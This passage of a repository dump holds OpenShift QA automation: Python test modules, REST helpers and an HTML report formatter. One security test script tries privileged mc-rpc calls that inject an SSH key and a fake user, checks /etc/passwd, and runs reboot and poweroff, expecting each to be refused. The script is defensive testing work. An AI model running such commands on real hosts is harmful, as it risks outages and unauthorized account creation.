\"\"\"\n    Usage: \n    fpath - path to the file for substitution\n    pattern2repl - dict of { 'pattern' : 'repl', ...} format\n    count, flags - see re.sub for more\n\n    try:\n        sub(\"/etc/passwd\", {\"^root.*\":\"#root\", \".*pattern$\":\"replacement\",...})\n    except:\n        ...\n\n    Throws an exception on error.\n    \"\"\"\n    c = read(fpath)\n    for p in pattern2repl.keys():\n        c = re.sub(p, pattern2repl[p], c, count, flags)\n    write(fpath, c)\n" }, { "alpha_fraction": 0.6215329766273499, "alphanum_fraction": 0.6450939178466797, "avg_line_length": 21.192052841186523, "blob_id": 
"c7c1b3fa582cb248e18db850e67a0492d40b19b3", "content_id": "8a78e70b42207623a836b7351ed68ecb7b38d79a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 3353, "license_type": "no_license", "max_line_length": 189, "num_lines": 151, "path": "/automation/open/testmodules/RT/security/data/execute_risky_system_binaries.sh", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/bin/sh\nuser_home=$(env | grep HOME | cut -d= -f2)\necho \"User Home Directory: $user_home\"\nuser_name=$(basename $user_home)\necho \"User name: $user_name\"\nuser_id=$(id -u $user_name)\necho \"User ID: $user_id\"\nlibra_version=$(/bin/rpm -qa | grep rhc)\necho \"Libra Verison on node: \"\necho \"$libra_version\"\necho \"\"\necho \"\"\necho \"\"\n\necho \"###Test Case 1###: Security - Execute risky system binaries\"\ncommand=\"ps -ef\"\necho \"Command: $command\"\n$command\ncommand1=\"ps -ef --no-headers | grep -v $user_id\"\necho \"Command1: $command1\"\neval \"$command1\"\ncommand1_ret=$?\necho \"Command 1 return $command1_ret\"\necho \"\"\necho \"\"\necho \"\"\n\ncommand2=\"/usr/sbin/mc-ping\"\necho \"Command2: $command2\"\n$command2 >./temp.log 2>&1\ntmp_ret=$?\ncat ./temp.log\necho \"Return $tmp_ret\"\ncommand=\"cat ./temp.log | grep 'ip-'\"\necho \"Command: $command\"\neval \"$command\"\ncommand2_ret=$?\necho \"Command 2 return $command2_ret\"\necho \"\"\necho \"\"\necho \"\"\n\nssh_pub_key='AAAAB3NzaC1yc2EAAAADAQABAAABAQDcjvxtCN9CGLk/BUXe7wo/LL+5cguYQbwe3o4gfQnu7gBHjMhxs1I1/J6c3E52sMN+83/LUb/CuKAuV9lzG5fOkbNxps6F0RqzEqvSH3UF7qdCgBZJx19Xyo+YQfd8eVnM3honLira+i/PiqRmMr0yrryqa5qNqreL52hVguQ0vFC7vJX6Nbg52mmFfZvyXG8ksrC3H+zpMT5FHq6MoxWqU3jCxQ4rpJZqM2VZ7xSpU/7wKevUK345CbwRfGSPsr6M1tkaaAhOoAYJrC3U0si+JFc6hS2OTFD9QmjYAWS0NvibbFPT3SOKzEm9U5GQDzlEIr33KNwAQmv1ZjTcWjZh'\nfake_uuid=$(uuidgen |sed 's/-//g')\nfake_email=\"[email protected]\"\nfake_app=\"fakeapp\"\nfake_namespace=\"fakeuser\"\n\ncommand3=\"/usr/sbin/mc-rpc --agent libra --action cartridge_do --arg cartridge=li-controller-0.1 --arg action=configure --arg args=\\\"-c ${fake_uuid} -e ${fake_email} -s ${ssh_pub_key} -d\\\"\"\necho \"Command3: $command3\"\neval \"$command3\"\ntmp_ret=$?\necho \"Return $tmp_ret\"\ncommand=\"grep $fake_uuid /etc/passwd\"\necho \"Command: $command\"\n$command\ncommand3_ret=$?\necho \"Command3 return $command3_ret\"\necho \"\"\necho \"\"\necho \"\"\n\ncommand4=\"/usr/sbin/mc-rpc --agent libra --action cartridge_do --arg cartridge=php-5.3 --arg action=configure --arg args=\\\"${fake_app} ${fake_namespace} ${user_name}\\\"\"\necho \"Command4: $command4\"\neval \"$command4\"\ntmp_ret=$?\necho \"Return $tmp_ret\"\necho \"ps -ef output:\"\nps -ef\ncommand=\"ps -ef | grep -v grep | grep $fake_app\"\necho \"Command: $command\"\neval \"$command\"\ncommand4_ret=$?\necho \"Command 4 return $command4_ret\"\necho \"\"\necho \"\"\necho \"\"\n\n \n\ncommand5=\"/usr/sbin/mc-rpc --agent libra --action cartridge_do --arg cartridge=php-5.3 --arg action=deconfigure --arg args=\\\"${fake_app} ${fake_namespace} ${user_name}\\\"\"\necho \"Command5: $command5\"\nif [ X\"$command4_ret\" == X\"0\" ]; then\n eval \"$command5\"\n tmp_ret=$?\n echo \"Return $tmp_ret\"\n echo \"ps -ef output:\"\n ps -ef\n command=\"ps -ef | grep -v grep | grep $fake_app\"\n echo \"Command: $command\"\n eval \"$command\"\n command_ret=$?\n if [ X\"$command_ret\" == X\"0\" ]; then\n command5_ret=1\n else\n command5_ret=0\n fi\nelse\n echo \"Skipping command 5 due to dependent command 4 failed, and assume it return 
1\"\n command5_ret=1\nfi\necho \"Command 5 return $command5_ret\"\necho \"\"\necho \"\"\necho \"\"\n\n\ncommand6=\"/sbin/reboot\"\necho \"Command 6: $command6\"\neval \"$command6\"\ncommand6_ret=$?\necho \"Command 6 return $command6_ret\"\necho \"\"\necho \"\"\necho \"\"\n\ncommand7=\"/sbin/poweroff\"\necho \"Command 7: $command7\"\neval \"$command7\"\ncommand7_ret=$?\necho \"Command 7 return $command7_ret\"\necho \"\"\necho \"\"\necho \"\"\n\ncommand8=\"/bin/rpm -qa | grep rhc\"\necho \"Command: $command8\"\neval \"$command8\"\ncommand8_ret=$?\necho \"Command 8 return $command8_ret\"\necho \"\"\necho \"\"\necho \"\"\n\n\nfor i in {1..8}; do \n eval ii=\"$\"command${i}_ret\n echo \"Command ${i} result: $ii\"\n if [ X\"$ii\" == X\"0\" ]; then \n result=\"FAIL\"\n break\n else \n result=\"PASS\"\n fi\ndone\n\n\necho \"###RESULT###: ${result}\"\necho \"\"\necho \"\"\necho \"\"\n\n\n" }, { "alpha_fraction": 0.7028753757476807, "alphanum_fraction": 0.7348242998123169, "avg_line_length": 33.77777862548828, "blob_id": "8f1acec95d7dc08439cecb3b5be73640900ad670", "content_id": "bbfa2ac59ca78968f547c7b7473bce9a54d37beb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 313, "license_type": "no_license", "max_line_length": 76, "num_lines": 9, "path": "/automation/p360test.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "from selenium import webdriver\n\ndriver = webdriver.Firefox()\n\ndriver.get('https://p360-devel.englab.nay.redhat.com/portal/public/p360')\n\n#text = driver.find_element_by_css_selector(\".content:nth-child(2) h2\").text\ntext = driver.execute_script(\"return $('.content:nth-child(2) h2')\").text\nprint \"seeessss: \", text\n" }, { "alpha_fraction": 0.5421234965324402, "alphanum_fraction": 0.5438545942306519, "avg_line_length": 38.3863639831543, "blob_id": "e42b5fdbf4cf15497709cc1bb74c51eb681f732f", "content_id": "f562b8e2854dc53d5ab5607ad56d228f83dfb5d8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3466, "license_type": "no_license", "max_line_length": 211, "num_lines": 88, "path": "/automation/open/testmodules/RT/client/rhc_app.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\nimport os\nimport common\nimport rhtest\n\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.user_email = self.config.OPENSHIFT_user_email\n self.user_passwd = self.config.OPENSHIFT_user_passwd\n try:\n self.test_variant = self.get_variant()\n except:\n print \"OPENSHIFT_test_name environment variable is not set. 
Running test with default php\"\n self.test_variant = 'php'\n self.app_type = common.app_types[self.test_variant]\n self.app_name = 'my%s%s' % (self.test_variant, common.getRandomString() )\n common.env_setup()\n\n def finalize(self):\n os.system(\"rm -rf %s\"%self.app_name)\n\n\nclass RhcApp(OpenShiftTest):\n def test_method(self):\n self.info(\"[US1317][UI][CLI]rhc wrapper - rhc app\")\n\n self.add_step(\"Help\",\n \"rhc app --help\",\n expect_description = \"Command line option --help should provide the appropriate help message\",\n expect_str = [\n \"List of Actions\", \"\\s+create\",\n \"\\s+git-clone\", \"\\s+delete\", \"\\s+start\", \"\\s+stop\", \"\\s+restart\", \"\\s+reload\", \"\\s+status\",\n \"\\s+force-stop\", \"\\s+tidy\", \n \"Global Options\", \"-l|--rhlogin\", \"-p|--password\", \n \"--noprompt\", \"-d|--debug\", \"-h|--help\", \"--config\", \"--timeout\", \n ])\n # Covering the full application life cycle\n for action in [ \"create\", \"start\", \"stop\", \"force-stop\", \"restart\", \"reload\", \"show\", \"tidy\", \"delete\"]:\n # Special parameters for some of the commands\n extra_options = \"\"\n if action == \"add-alias\" or action == \"remove-alias\":\n extra_options = \"--alias www.example.com\"\n elif action == \"create\":\n extra_options = \"-t %s\" % ( self.app_type )\n elif action == \"delete\":\n extra_options = \"--confirm\"\n elif action.startswith(\"snapshot\"):\n extra_options = \"--filepath=/tmp/%s.tar.gz\" % ( self.app_name )\n \n # Actions are tested with failure and success\n for result in [ \"success\", \"failure\"]:\n extra_options_suffix = \"\"\n app_name_suffix = \"\"\n if result == \"success\":\n return_value_expected = 0\n elif result == \"failure\":\n return_value_expected = \"!0\"\n if action == \"create\":\n extra_options_suffix = common.getRandomString()\n else:\n app_name_suffix = common.getRandomString()\n self.add_step(\"Action '%s' - %s\" % ( action, result.upper() ),\n \"rhc app %s -a %s%s -l %s -p %s %s%s %s\" % ( action, self.app_name, app_name_suffix, self.user_email, self.user_passwd, extra_options, extra_options_suffix, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_description = \"The action is performed with %s\" % ( result ),\n expect_return = return_value_expected)\n\n self.run_steps()\n\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(RhcApp)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5601145029067993, "alphanum_fraction": 0.5639312863349915, "avg_line_length": 30.28358268737793, "blob_id": "bfcda41985651251c81c9b1328a6e1f5a22cfb78", "content_id": "99fc9e193b6daa7a0004a9bb85c3b9dc1ea16db1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2096, "license_type": "no_license", "max_line_length": 116, "num_lines": 67, "path": "/automation/open/testmodules/RT/cartridge/mysql_without_password.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "\"\"\"\n\"\"\"\n\nimport common\nimport rhtest\n\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.user_email = self.config.OPENSHIFT_user_email\n self.user_passwd = self.config.OPENSHIFT_user_passwd\n test_variant = \"php\"\n self.app_type = common.app_types[test_variant]\n self.app_name = 'my%s%s' % ( test_variant, common.getRandomString(5) )\n\n common.env_setup()\n 
self.info(\"[US1848][runtime][rhc-cartridge] Access embeded mysql server from shell without typing password\")\n\n def finalize(self):\n pass\n\n\nclass MysqlWithoutPassword(OpenShiftTest):\n def test_method(self):\n\n self.add_step(\"Creating an application\",\n common.create_app,\n function_parameters = [ self.app_name, \n self.app_type, \n self.user_email, \n self.user_passwd, \n False],\n expect_description = \"The application must be created successfully\",\n expect_return = 0)\n\n self.add_step(\"Embedding MySQL cartridge\",\n common.embed,\n function_parameters = [ self.app_name, \n \"add-\" + common.cartridge_types[\"mysql\"] ],\n expect_description = \"MySQL cartridge must be embedded successfully\",\n expect_return = 0)\n\n self.add_step(\"Accessing remote MySQL console\",\n common.rhcsh,\n function_parameters = [ self.app_name, \n [ ( 'sendline', 'mysql'), ( 'expect', 'mysql> ') ] ],\n expect_description = \"The console must be accessible without password\",\n expect_return = 0)\n\n self.run_steps()\n\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(MysqlWithoutPassword)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5772851705551147, "alphanum_fraction": 0.581536591053009, "avg_line_length": 34.78804397583008, "blob_id": "57cb034592f6fffee761f0f310b21c0711bd40af", "content_id": "d6a03316a9930602ab26af69ae9a98929d30d22e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6586, "license_type": "no_license", "max_line_length": 238, "num_lines": 184, "path": "/automation/open/lib/common/rest.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "from consts import *\nfrom misc import *\nimport time, os, re\nimport OSConf\nimport openshift #rest api\nimport shutil\n\n#\n# All of the rest helpers as alternatives to rhc-client functionalities\n#\n\ndef create_app2(app_name, app_type, user_email=None, user_passwd=None, \n clone_repo=True, git_repo=\"./\", scalable=False, \n gear_size = \"small\", disable_autoscaling=True):\n \"\"\"Similar as craate_app but with using REST API\"\"\"\n if user_email is None:\n (user_email, user_passwd) = get_default_rhlogin()\n rest = openshift.Openshift(host=get_instance_ip(), \n user=user_email, \n passwd=user_passwd)\n if scalable:\n scalable = 'true'\n else:\n scalable = 'false'\n\n (status, response) = rest.app_create_scale(app_name, app_type, scalable)\n if status in ('Created', 'OK'):\n OSConf.setup_by_rest()\n if clone_repo:\n git_clone_app(app_name)\n return 0\n else:\n return 1\n\n\ndef destroy_app2(app_name, user_email=None, user_passwd=None, clean_repo=False, git_repo=\"./\"):\n \"\"\"REST variant of destro_app\"\"\"\n if user_email is None:\n (user_email, user_passwd) = get_default_rhlogin()\n rest = openshift.Openshift(host=get_instance_ip(), \n user=user_email, \n passwd=user_passwd)\n rest.app_delete(app_name)\n\n if clean_repo == True and os.path.exists(git_repo):\n shutil.rmtree(git_repo)\n\n OSConf.remove_app(app_name)\n\n\ndef create_scalable_app2(app_name, app_type, user_email=None, user_passwd=None, \n clone_repo=True, git_repo=\"./\", gear_size=\"small\", \n disable_autoscaling=True):\n \"\"\"Create app with REST API\"\"\"\n if user_email is None:\n (user_email, user_passwd) = get_default_rhlogin()\n\n rest = openshift.Openshift(host=get_instance_ip(), \n 
user=user_email, \n                               passwd=user_passwd)\n    if scalable:\n        scalable = 'true'\n    else:\n        scalable = 'false'\n\n    (status, response) = rest.app_create_scale(app_name, app_type, scalable)\n    if status in ('Created', 'OK'):\n        OSConf.setup_by_rest()\n        if clone_repo:\n            git_clone_app(app_name)\n        return 0\n    else:\n        return 1\n\n\ndef destroy_app2(app_name, user_email=None, user_passwd=None, clean_repo=False, git_repo=\"./\"):\n    \"\"\"REST variant of destroy_app\"\"\"\n    if user_email is None:\n        (user_email, user_passwd) = get_default_rhlogin()\n    rest = openshift.Openshift(host=get_instance_ip(), \n                               user=user_email, \n                               passwd=user_passwd)\n    rest.app_delete(app_name)\n\n    if clean_repo == True and os.path.exists(git_repo):\n        shutil.rmtree(git_repo)\n\n    OSConf.remove_app(app_name)\n\n\ndef create_scalable_app2(app_name, app_type, user_email=None, user_passwd=None, \n                         clone_repo=True, git_repo=\"./\", gear_size=\"small\", \n                         disable_autoscaling=True):\n    \"\"\"Create app with REST API\"\"\"\n    if user_email is None:\n        (user_email, user_passwd) = get_default_rhlogin()\n\n    rest = openshift.Openshift(host=get_instance_ip(), \n                               user=user_email, \n                               passwd=user_passwd)\n    (status, response) = rest.app_create_scale(app_name, app_type)\n    if status in ('OK', 'Created'):\n        OSConf.setup_by_rest()\n        if clone_repo:\n            git_clone_app(app_name)\n        if disable_autoscaling:\n            if clone_repo:\n                touch(os.path.join(app_name,\".openshift/markers/disable_auto_scaling\"))\n                cmd = \"cd %s && git add . && git commit -amt && git push\" % (app_name)\n                log.debug(\"Disabling autoscaling...\")\n                (retcode, output) = command_getstatusoutput(cmd, quiet = True)\n                if retcode != 0:\n                    log.error(\"Unable to disable autoscaling: %s\"%output)\n            else:\n                log.warning(\"Unable to disable autoscaling because clone_repo is disabled\")\n    else:\n        log.error(response)\n    if status in ('OK', 'Created'):\n        return 0\n    else:\n        return 1\n\n\ndef scale_up(app_name, domain_name=None, user_email=None, user_passwd=None):\n    if user_email is None:\n        (user_email, user_passwd) = get_default_rhlogin()\n    rest = openshift.Openshift(host=get_instance_ip(), \n                               
log.error(\"Unable to find given template\")\n return None\n\n\ndef create_app_using_template(app_name, template_tag):\n template_uuid = get_application_template_uuid(template_tag)\n log.debug(template_uuid)\n (user, passwd) = get_default_rhlogin()\n rest = openshift.Openshift(host=get_instance_ip(), user=user, passwd=passwd)\n (status, resp) = rest.app_create(app_name, 'template', template_uuid=template_uuid )\n if status == 'OK':\n return 0\n else:\n return 1\n\n" }, { "alpha_fraction": 0.5590289235115051, "alphanum_fraction": 0.5680080056190491, "avg_line_length": 36.12345504760742, "blob_id": "b52131327a9c3bb46aef090ad594fca04bab2011", "content_id": "ff21651a516649bf8fc300a6fe6a78ec70a95eb7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3007, "license_type": "no_license", "max_line_length": 166, "num_lines": 81, "path": "/automation/open/testmodules/RT/cartridge/jenkins_and_user_not_logged_in.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n\"\"\"\nAttila Nagy\[email protected]\nJune 12, 2012\n\n[US1941][runtime][rhc-cartridge]A user not logged in jenkins can not see the build and workspace existed in jenkins [P1]\nhttps://tcms.engineering.redhat.com/case/138302/\n\"\"\"\n\nimport rhtest\nimport common\nimport OSConf\n\nclass OpenShiftTest(rhtest.Test):\n \n def initialize(self):\n try:\n self.test_variant = common.get_variant()\n except:\n self.info(\"Test variant is not specified. Using 'php' as default...\")\n self.test_variant = \"php\"\n \n self.app_name = self.test_variant.split('-')[0] + common.getRandomString()\n common.env_setup() \n\n\n def finalize(self):\n if self.test_variant in ( \"jbossas\", \"jbosseap\" ):\n if self.config.options.run_mode==\"DEV\":\n common.change_node_profile(\"small\")\n \n\nclass JenkinsAndUserNotLoggedIn(OpenShiftTest):\n def test_method(self):\n self.info(\"=====================\")\n self.info(\"Creating a Jenkins application\")\n self.info(\"=====================\")\n common.create_app(\"jenkins\", common.app_types[\"jenkins\"], self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, clone_repo = False)\n \n self.info(\"=====================\")\n self.info(\"Creating an application\")\n self.info(\"=====================\")\n common.create_app(self.app_name, common.app_types[self.test_variant], self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, clone_repo = False)\n \n if self.test_variant in ( \"jbossas\", \"jbosseap\" ):\n if self.config.options.run_mode==\"DEV\":\n common.change_node_profile(\"medium\")\n \n self.info(\"=====================\")\n self.info(\"Embedding Jenkins client\")\n self.info(\"=====================\")\n common.embed(self.app_name, \"add-\" + common.cartridge_types[\"jenkins\"])\n \n self.info(\"=====================\")\n self.info(\"Checking Jenkins URLs\")\n self.info(\"=====================\")\n for url in ( OSConf.default.conf[\"apps\"][\"jenkins\"][\"url\"], OSConf.default.conf[\"apps\"][self.app_name][\"embed\"][common.cartridge_types[\"jenkins\"]][\"url\"] ):\n ret_code = common.grep_web_page(\n url,\n [ \"Authentication required\", r\"window.location.replace\\('/login\" ],\n \"-L -k -H 'Pragma: no-cache'\",\n 30, 5 \n )\n self.assert_equal(ret_code, 0, \"Login form must be shown\")\n \n \n return self.passed(\"[US1941][runtime][rhc-cartridge]A user not logged in jenkins can not see the build and workspace existed in jenkins [P1]\")\nclass 
OpenShiftTestSuite(rhtest.TestSuite):\n    pass\n\ndef get_suite(conf):\n    suite = OpenShiftTestSuite(conf)\n    suite.add_test(JenkinsAndUserNotLoggedIn)\n    #### user can add multiple sub tests here.\n    return suite\n\ndef run(conf):\n    suite = get_suite(conf)\n    suite()\n" }, { "alpha_fraction": 0.5497929453849792, "alphanum_fraction": 0.5588641166687012, "avg_line_length": 34.20833206176758, "blob_id": "a9d1c299913cf09cde0acaa55989f14d7931db82", "content_id": "689905e4433a948cb1b717e809ae6c965281dc6e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5071, "license_type": "no_license", "max_line_length": 218, "num_lines": 144, "path": "/automation/open/testmodules/RT/cartridge/disk_space_cleanup.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "\"\"\"\nAttila Nagy\[email protected]\nFeb 23, 2012\n\n[US1107][rhc-cartridge] Disk space cleanup using rhc app tidy\nhttps://tcms.engineering.redhat.com/case/122527/\n\"\"\"\n\nimport os\nimport common\nimport rhtest\n\n\nclass OpenShiftTest(rhtest.Test):\n    INTERACTIVE = False\n\n    def initialize(self):\n        self.summary = \"[US1107][rhc-cartridge] Disk space cleanup using rhc app tidy\"\n        try:\n            self.test_variant = self.config.test_variant\n        except:\n            self.info(\"Missing OPENSHIFT_test_name, used `jbosseap` as default\")\n            self.test_variant = 'jbosseap'\n\n        self.app_type = common.app_types[self.test_variant]\n        self.app_name = common.getRandomString(10)\n        self.cart = common.type_to_cart(self.app_type)\n\n        common.env_setup()\n\n    def finalize(self):\n        os.system(\"rm -rf %s\"%(self.app_name))\n\n\nclass DiskSpaceCleanup(OpenShiftTest):\n\n    def test_method(self):\n        self.info(self.summary)\n\n        self.add_step(\n            'Creating an application',\n            common.create_app,\n            function_parameters = [ self.app_name, \n                self.app_type, \n                self.config.OPENSHIFT_user_email, \n                self.config.OPENSHIFT_user_passwd, \n                False ],\n            expect_description = 'The app should be created successfully',\n            expect_return = 0)\n\n        self.add_step(\n            \"Visiting the application's URL (to generate access.log file)\",\n            common.check_web_page_output,\n            function_parameters = [ self.app_name, 'health', '1' ],\n            expect_description = 'The application must be alive',\n            expect_return = 0)\n\n        self.add_step(\n            \"Running command 'tidy' and checking the result\",\n            self.tidy_and_comparation,\n            function_parameters = [ self.app_name],\n            expect_description = \"Temporary files must be created successfully and must disappear after running 'tidy'\",\n            expect_return = 1) # It's a Python function\n\n        self.run_steps()\n\n        return self.passed(\"%s passed\" % self.__class__.__name__)\n\n    def tidy_and_comparation(self, app_name):\n        \"\"\"\n        This function returns 1 if the comparison was successful (new_size < original_size)\n        Returns 0 otherwise\n        \"\"\"\n        # Step 1: Getting the original repo size\n        original_size = common.get_git_repo_size(app_name)\n\n        # Step 2: Creating temporary files, the name is a random string\n        files = list()\n        random_name = common.getRandomString()\n\n        files.append(r\"/tmp/%s.txt\" % ( random_name ))\n        files.append(r\"${OPENSHIFT_GEAR_DIR}/tmp/%s.txt\" % ( random_name ))\n\n        if self.test_variant == 'jbosseap':\n            files.append(r\"${OPENSHIFT_%s_LOG_DIR}/%s.txt\" % ( self.cart, random_name ))\n\n        elif self.test_variant in (\"ruby\",\"rack\"):\n            files.append(r\"${OPENSHIFT_REPO_DIR}/tmp/%s.txt\" % ( random_name ))\n\n        ( ret_code, ret_output ) = common.run_remote_cmd(app_name, \n            \"set -x && \" + ' && '.join(map(( lambda x: \"touch \" + 
x), files)))\n if ret_code != 0:\n print \"Failed to create temporary file\"\n return 0\n\n # Step 3: Running command 'tidy'\n ( ret_code, ret_output ) = common.command_getstatusoutput(\"rhc app tidy %s -l %s -p '%s' %s \" % (app_name, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS))\n if ret_code != 0:\n print \"Failed to run command 'tidy'\"\n return 0\n \n # Step 4: Checking Git repo size\n new_size = common.get_git_repo_size(app_name)\n\n if int(new_size) < int(original_size):\n print \"OK. Git repo size is smaller\"\n else:\n print \"Git repo size must be smaller\"\n return 0\n\n # Step 5: Checking the existence of the temporary files\n ( ret_code, ret_output ) = common.run_remote_cmd(\n app_name,\n \"set -x && \" + ' && '.join(map(( lambda x: 'test ! -f %s' + x ), files))\n )\n if ret_code != 0:\n print \"Existing temporary files after running the command 'tidy'...\"\n return 0\n\n # Step 6: Checking access log files\n (ret_code, ret_output) = common.run_remote_cmd(app_name, r\"test \\! -f ${OPENSHIFT_%s_LOG_DIR}access.log*\" % (self.cart))\n if ret_code != 0:\n print \"Existing access.log file in OPENSHIFT_%s_LOG_DIR\" % (self.cart)\n return 0\n\n # Otherwise everything is OK\n return 1\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(DiskSpaceCleanup)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5664275884628296, "alphanum_fraction": 0.5794057250022888, "avg_line_length": 21.875, "blob_id": "0926f9b76e34accc0bc1e6d64364fe66226c8ba8", "content_id": "db7b9bc36f0909cd2dc146f73fcd4bcc119a3f73", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5856, "license_type": "no_license", "max_line_length": 97, "num_lines": 256, "path": "/automation/open/lib/reports/Html.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n# -*- coding: ascii -*-\n# vim:ts=4:sw=4:softtabstop=0:smarttab\n# License: LGPL\n# Keith Dart <[email protected]>\n\n\"\"\"\nReport object that creats XHTML format reports. 
\n\n\"\"\"\n\nimport sys\nimport reports\n\nimport XML.XHTML as XHTML\n\ndef escape(s):\n\ts = s.replace(\"&\", \"&amp;\") # Must be first\n\ts = s.replace(\"<\", \"&lt;\")\n\ts = s.replace(\">\", \"&gt;\")\n\ts = s.replace('\"', \"&quot;\")\n\treturn s\n\nclass HTMLFormatter(reports.NullFormatter):\n\tMIMETYPE = \"text/html\"\n\t_MSGTYPESUB = {\n\t\t\"PASSED\":'<font color=\"green\">PASSED</font>',\n\t\t\"FAILED\":'<font color=\"red\">FAILED</font>',\n\t\t\"ERROR\":'<font color=\"red\">ERROR</font>',\n\t\t\"COMPLETED\":'<font color=\"green\">COMPLETED</font>',\n\t\t\"INCOMPLETE\":'<font color=\"yellow\">INCOMPLETE</font>',\n\t\t\"ABORTED\":'<font color=\"yellow\">ABORTED</font>',\n\t\t\"INFO\":\"INFO\",\n\t\t\"DIAGNOSTIC\":'<font color=\"brown\">DIAGNOSTIC</font>',\n\t}\n\n\tdef title(self, title):\n\t\ts = [\"<br><h1>\"]\n\t\ts.append(escape(title))\n\t\ts.append(\"</h1>\\n\")\n\t\treturn \"\".join(s)\n\n\tdef heading(self, text, level=1):\n\t\ts = []\n\t\ts.append(\"\\n<h%s>\" % (level,))\n\t\ts.append(escape(text))\n\t\ts.append(\"</h%s>\\n\" % (level,))\n\t\treturn \"\".join(s)\n\n\tdef paragraph(self, text):\n\t\treturn \"<p>%s</p>\\n\" % (escape(text),)\n\n\tdef message(self, msgtype, msg, level=1):\n\t\tmsg = str(msg)\n\t\tmsgtype = self._MSGTYPESUB.get(msgtype, msgtype)\n\t\tif msg.find(\"\\n\") > 0:\n\t\t\treturn \"%s: <pre>%s</pre><br>\\n\" % (msgtype, escape(msg))\n\t\telse:\n\t\t\treturn '<font face=\"courier\" size=\"-1\">%s: %s</font><br>\\n' % (msgtype, escape(msg))\n\n\tdef text(self, text):\n\t\treturn \"<pre>\\n%s\\n</pre>\\n\" % (text,)\n\n\tdef url(self, text, url):\n\t\treturn '<a href=\"%s\">%s</a>\\n' % (url, text)\n\n\tdef summary(self, text):\n\t\tsum = \"<pre>\\n%s\\n</pre>\\n\" % (text,)\n\t\treturn sum.replace(\"PASSED\", self._MSGTYPESUB[\"PASSED\"])\n\tdef section(self):\n\t\treturn \"<hr>\\n\"\n\n\tdef page(self):\n\t\treturn \"<br><hr><br>\\n\"\n\n\tdef initialize(self):\n\t\treturn \"\"\"<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Final//EN\">\n<html>\n <head>\n\t<title>Test Results</title>\n </head>\n<body>\n\"\"\"\n\tdef finalize(self):\n\t\treturn \"\\n</body>\\n</html>\\n\"\n\n\n\nclass XHTMLFormatter(reports.NullFormatter):\n\tMIMETYPE = \"text/html\"\n\t_MSGTYPESUB = {\n\t\t\"PASSED\": '<span class=\"passed\">PASSED</span>',\n\t\t\"FAILED\": '<span class=\"failed\">FAILED</span>',\n\t\t\"COMPLETED\": '<span class=\"completed\">COMPLETED</span>',\n\t\t\"ERROR\": '<span class=\"error\">ERROR</span>',\n\t\t\"INCOMPLETE\": '<span class=\"incomplete\">INCOMPLETE</span>',\n\t\t\"ABORTED\": '<span class=\"aborted\">ABORTED</span>',\n\t\t\"INFO\": '<span class=\"info\">INFO</span>',\n\t\t\"DIAGNOSTIC\": '<span class=\"diagnostic\">DIAGNOSTIC</span>',\n\t}\n\n\tdef initialize(self):\n\t\treturn \"\"\"<!DOCTYPE HTML PUBLIC \"-//W3C//DTD XHTML 1.0 Strict//EN\" \"xhtml1-strict.dtd\">\n<html>\n <head>\n <meta http-equiv=\"Content-Type\" content=\"text/html; charset=iso-8859-1\" />\n <title>Test Results</title>\n <style type=\"text/css\">\nbody {background: white; color: black;\n margin: .25in; border: 0; padding: 0;\n font:13px/1.45 sans-serif; \n}\na:link {\n background-color: transparent;\n}\na:visited\t{\n background-color: transparent;\n}\na:active\t{\n background-color: transparent;\n}\na:hover {\n background-color: transparent;\n text-decoration:underline;\n}\nimg {\n border:0;\n}\nh1, h2, h3, h4, h5, h6 {\n font-family: Arial, sans-serif;\n color: #333;\n background: transparent;\n margin-bottom:0;\n padding:0;\n}\nh1 {\n font-size: 135%;\n padding: 0;\n 
